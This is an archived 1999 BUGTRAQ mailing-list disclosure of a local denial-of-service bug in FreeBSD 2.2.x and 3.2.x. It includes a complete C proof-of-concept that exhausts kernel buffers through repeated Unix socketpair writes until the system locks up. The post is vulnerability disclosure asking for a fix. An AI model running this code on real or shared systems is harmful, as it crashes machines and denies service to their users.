Subject: Local DoS in FreeBSD
To: None <BUGTRAQ@SECURITYFOCUS.COM>
From: L. Sassaman <rabbi@QUICKIE.NET>
List: tech-net
Date: 08/27/1999 00:43:47
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This was first posted to the FreeBSD security list on the 9th of August,
subsequently discussed on freebsd-stable and freebsd-hackers... no one
seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x
machines consistantly. I have also been told that it affects NetBSD and
OpenBSD, though I haven't confirmed it.

Someone with the know-how care to fix?



L. Sassaman

System Administrator                | "Even the most primitive society has
Technology Consultant               |  an innate respect for the insane."
icq.. 10735603                      |
pgp.. finger://ns.quickie.net/rabbi |                    --Mickey Rourke


- ---


#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }

        return(0);
}
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v0.9.10 (GNU/Linux)
Comment: OpenPGP Encrypted Email Preferred.

iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91
TkVIqNdQpRi8CK9vySilouE=
=7ufs
-----END PGP SIGNATURE-----